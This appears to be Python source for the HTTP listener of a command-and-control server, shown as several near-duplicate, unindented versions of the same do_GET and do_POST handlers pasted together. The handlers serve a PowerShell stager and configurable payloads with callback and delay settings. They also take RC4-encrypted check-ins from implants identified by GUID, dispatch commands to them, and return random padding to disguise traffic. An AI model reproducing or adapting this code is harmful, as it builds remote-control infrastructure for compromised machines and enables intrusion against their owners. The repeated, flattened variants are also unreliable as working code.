def do_GET(self):
force_download = False
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split("/")[-1]
if path == self.config.get("http-download-path"):
Log.log_event(
"Download Stager",
"PowerShell stager was fetched from %s (%s)" %
(self.client_address[0], self.address_string()))
self.output = Utils.load_powershell_script("stager.ps1", 56)
elif path in Utils.get_download_folder_content():
force_download = True
self.output = Utils.load_file("download/%s" % path)
Log.log_event(
"Download File", "%s was downloaded from %s (%s)" %
(path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
Log.log_error("Invalid request got a GET request", self.path)
self.return_data(force_download)
def do_GET(self):
force_download = False
if self.path.split('/')[1] == 'api':
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split('/')[-1]
payload_path = self.path.split('/')
filename = Utils.gen_str(12)
if payload_path[1] == self.config.get('http-download-path'):
filename = Utils.gen_str(12)
force_download = True
Log.log_event('Download Stager', 'Stager was fetched from %s (%s)' % (self.client_address[0], self.address_string()))
payload = Payload(self.config)
payload.set_callback("__default__")
if len(payload_path) > 3:
payload.set_type(payload_path[2])
if len(payload_path) > 4:
payload.set_delay(payload_path[3])
payload.set_callback(payload_path[4])
self.output = payload.get_output()
elif path in Utils.get_download_folder_content():
force_download = True
self.output = Utils.load_file('download/%s' % path)
Log.log_event('Download File', '%s was downloaded from %s (%s)' % (path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file('html/%s' % self.config.get('http-default-404'))
Log.log_error('Invalid request got a GET request', self.path)
self.return_data(force_download, filename)
def do_POST(self):
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
length = 0
if not self.headers.getheader("Content-Length") == None:
length = int(self.headers.getheader("Content-Length"))
data = self.rfile.read(length)
try:
data = json.loads(data)
data["Data"] = self.rc4.crypt(base64.b64decode(data["Data"]))
except:
Log.log_error("Invalid base64 data received or bad decryption",
self.path)
self.return_data()
return
guid = ""
try:
guid = Utils.validate_guid(data["ID"])
except:
Log.log_error("Invalid request no GUID", self.path)
self.return_data()
return
if not guid == None:
self.db.update_checkin(guid)
parser = HTTPDParser(config)
output = parser.parse_cmd(guid, data["Data"], data["UUID"])
if not output == None:
uuid = output[:36]
output = output[37:]
self.output = base64.b64encode(self.rc4.crypt(output))
self.output = json.dumps({
"UUID": uuid,
"ID": guid,
"Data": self.output
})
else:
self.output = json.dumps({
"UUID":
None,
"ID":
guid,
"Data":
Utils.gen_str(random.randrange(10, 1000))
})
self.return_json()
return
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
self.return_data()
def do_POST(self):
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
guid = ""
try:
guid = Utils.validate_guid(self.path.split('?', 1)[1])
except:
Log.log_error("Invalid request no GUID", self.path)
self.return_data()
return
if not guid == None:
self.db.update_checkin(guid)
length = 0
if not self.headers.getheader("Content-Length") == None:
length = int(self.headers.getheader("Content-Length"))
data = self.rfile.read(length)
try:
data = self.rc4.crypt(base64.b64decode(data))
except:
Log.log_error("Invalid base64 data received", self.path)
self.return_data()
return
parser = HTTPDParser(config)
self.output = base64.b64encode(self.rc4.crypt(parser.parse_cmd(guid, data)))
else:
self.output = Utils.load_file("html/%s" % self.config.get("http-default-404"))
self.return_data()
def do_POST(self):
if self.path.split('/')[1] == 'api':
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
length = 0
if not self.headers.getheader('Content-Length') == None:
length = int(self.headers.getheader('Content-Length'))
data = self.rfile.read(length)
try:
data = json.loads(data)
data['Data'] = self.rc4.crypt(base64.b64decode(data['Data']))
except:
Log.log_error('Invalid base64 data received or bad decryption',
self.path)
self.return_data()
return
guid = ''
try:
guid = Utils.validate_guid(data['ID'])
except:
Log.log_error('Invalid request no GUID', self.path)
self.return_data()
return
if not guid == None:
self.db.update_checkin(guid, str(self.client_address[0]))
parser = HTTPDParser(config)
output = parser.parse_cmd(guid, data['Data'], data['UUID'])
if not output == None:
uuid = output[:36]
output = output[37:]
self.output = \
base64.b64encode(self.rc4.crypt(output))
self.output = json.dumps({
'UUID': uuid,
'ID': guid,
'Data': self.output
})
else:
self.output = json.dumps({
'UUID':
None,
'ID':
guid,
'Data':
Utils.gen_str(random.randrange(10, 1000))
})
self.return_json()
return
else:
self.output = Utils.load_file(
'html/%s' % self.config.get('http-default-404'))
self.return_data()
def do_GET(self):
force_download = False
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split("/")[-1]
payload_path = self.path.split("/")
if payload_path[1] == self.config.get("http-download-path"):
filename = Utils.gen_str(12)
force_download = True
Log.log_event(
"Download Stager", "Stager was fetched from %s (%s)" %
(self.client_address[0], self.address_string()))
payload = Payload(self.config)
if len(payload_path) > 3:
payload.set_type(payload_path[2])
if len(payload_path) > 4:
payload.set_delay(payload_path[3])
self.output = payload.get_output()
elif path in Utils.get_download_folder_content():
force_download = True
self.output = Utils.load_file("download/%s" % path)
Log.log_event(
"Download File", "%s was downloaded from %s (%s)" %
(path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
Log.log_error("Invalid request got a GET request", self.path)
self.return_data(force_download, filename)